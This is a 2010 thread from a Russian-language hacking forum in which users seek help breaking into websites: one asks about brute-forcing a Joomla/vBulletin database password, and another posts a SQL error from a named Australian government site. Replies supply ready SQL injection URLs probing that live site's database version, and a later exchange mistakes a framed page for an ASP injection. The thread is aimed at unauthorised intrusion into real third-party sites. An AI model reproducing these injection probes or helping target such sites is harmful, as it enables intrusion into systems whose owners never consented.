
31.05.2010, 15:22
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от mr.celt
Что-то мне подсказывает, что это joomla 
Она самая,а что?
|
|
|

31.05.2010, 15:31
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от ~d0s~
Она самая,а что?
Потому что в joomle во многих случаях используется чистый md5 хешь.
Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
|
|
|

31.05.2010, 15:37
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от mr.celt
Потому что в joomle во многих случаях используется чистый md5 хешь.
Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
Ну еслибы был доступ к базе,я бы щас ничего уже не спрашивал 
Токо вот вопрос был,можно ли как-то сбрутить пасс от бд,зная все данные кроме пасса,а не какой алгоритм шифрования в джумле.
P.S.Ну в джумле я раньше встречал только алгоритм md5($pass.$salt).Вообще,тут не все так просто,там еще стоит итеграция базы форума(vbulletin) и сайта(joomla).
Последний раз редактировалось ~d0s~; 31.05.2010 в 15:39..
|
|
|

31.05.2010, 16:15
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
не видел никояда пасс от бд бил мд5//
|
|
|

31.05.2010, 16:19
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Скажите, как быть, если вот такая ошибка:
Database error: Invalid SQL: SELECT * FROM page WHERE id = 66ý AND (status = 'active' OR status = 'locked') AND date_push < '2010-05-31 22:17:16' AND (date_pull = '0000-00-00 00:00:00' OR date_pull > '2010-05-31 22:17:16') ORDER BY rank
MySQL Error: 1054 (Unknown column '66ý' in 'where clause')
Session halted.
Можно ли провести инъекцию в таком случае? Вот линк:
http://www.bicentenary.tas.gov.au/page.php?id=66%FD
|
|
|

31.05.2010, 16:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от CyberHunter
Скажите, как быть, если вот такая ошибка:
Можно ли провести инъекцию в таком случае? Вот линк:
попробуй):
Код:
http://www.bicentenary.tas.gov.au/page.php?id=-66+or+1=1+and+substring(version(),1,1)=3
|
|
|

31.05.2010, 16:41
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
2 CyberHunter
http://www.bicentenary.tas.gov.au/print.php?id=127+and+substring(version(),1,1)=3
3 ветка
|
|
|

31.05.2010, 19:20
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.johnrausch.com/PuzzleWorld/toc.asp?t=_cat/io001.htm&m=https://forum.antichat.ru
открывается в фрейме
и как это понять? asp инъекция?
вот только asp файлы не интерпретируются...
|
|
|

31.05.2010, 19:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Konqi
http://www.johnrausch.com/PuzzleWorld/toc.asp?t=_cat/io001.htm&m=https://forum.antichat.ru
открывается в фрейме
и как это понять? asp инъекция?
вот только asp файлы не интерпретируются...
*FACEPALM*
Ну раз фрейм, какая нах asp инъекция?
Уважаемые ачатовцы, вы меня с каждым днём всё больше удивляйте со своими вопросами.
Сообщение от pinch
у некоторых мания величия...
А помоему кто-то тупо набивает посты и хочет быть в бане.
И не мания величия это, а обычная реакция на вопросы типа:
"Пишу -1 union select 1, а мне в ответ The used SELECT statements have a different number of columns".
И то что я тебя упомянул в прошлом посте, ты заслужил этого.
Последний раз редактировалось Ctacok; 31.05.2010 в 20:08..
|
|
|

31.05.2010, 19:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Ctacok
*FACEPALM*
Ну раз фрейм, какая нах asp инъекция?
Уважаемые ачатовцы, вы меня с каждым днём всё больше удивляйте со своими вопросами.
первый раз встречал,и поэтому не был уверен..а так понял .спс ))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|